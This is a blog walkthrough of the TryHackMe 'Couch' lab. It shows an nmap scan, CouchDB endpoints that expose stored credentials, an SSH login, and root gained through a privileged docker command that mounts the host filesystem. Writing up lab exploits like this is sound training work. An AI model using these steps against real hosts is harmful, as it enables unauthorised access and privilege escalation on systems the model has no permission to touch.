TryHackME: Couch

Today we will take a look at TryHackMe: Couch. My goal in sharing this writeup is to show you the way if you are in trouble. Please try to understand each step and take notes.


  1. Scan the machine. How many ports are open?
  2. What is the database management system installed on the server?
  3. What port is the database management system running on?
  4. What is the version of the management system installed on the server?

You will find the answers to the first four questions during the network scan.

  • Network scan

Command: nmap -p- -sV -sC -oN nmap/open — open

  • What is the path for the web administration tool for this database management system?

This requires research.

Answer: _utils

  • What is the path to list all databases in the web browser of the database management system?

When we look at the site I mentioned, we come across such a sentence.

“*/_all_dbs**Returns a list of all the databases in the CouchDB instance.”

Answer: _all_dbs

  • What are the credentials found in the web administration tool?

When we return to CouchDB, we see the secret folder. If we look at the content, we can find the username and password in passwordbackup.

  • Ssh

Let’s connect to the server via ssh with the given credentials.

Command: ssh atena@

  • Escalate privileges

When we look at user logs, we come across such a command. Let’s use.

Command: cat .bash_history

Command: docker -H run — rm -it — privileged — net=host -v /:/mnt alpine

note: it was normal that you could not find root.txt. because it is at the root in the mnt folder. Good luck;)

And now we are the root

“If you have any questions or comments, please do not hesitate to write. Have a good days”




Hello, my name is Elman. I am from Azerbaijan. I wish you a good days

Love podcasts or audiobooks? Learn on the go with our new app.

Recommended from Medium

Visual Studio 2019: Unveiling The Hidden Gems That Boost Developer’s Productivity

Access Control issue

Remotely control your radiator heating for less than €20

Why is React Native a Leading Choice for App Development over Hybrid Apps?

How to Pass the GCP Professional Cloud Architect Certification

Part 4: Java Thread Interview Questions & Answers (Race condition, Deprecated Methods…

How To Estimate Product Development?

Building your First Flutter App

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store
Al1z4deh:~# echo "Welcome"

Al1z4deh:~# echo "Welcome"

Hello, my name is Elman. I am from Azerbaijan. I wish you a good days

More from Medium

TryHackMe: UltraTech

Tryhackme Git Happens

TryHackMe: Bookstore

TryHackMe Undercover Official Writeup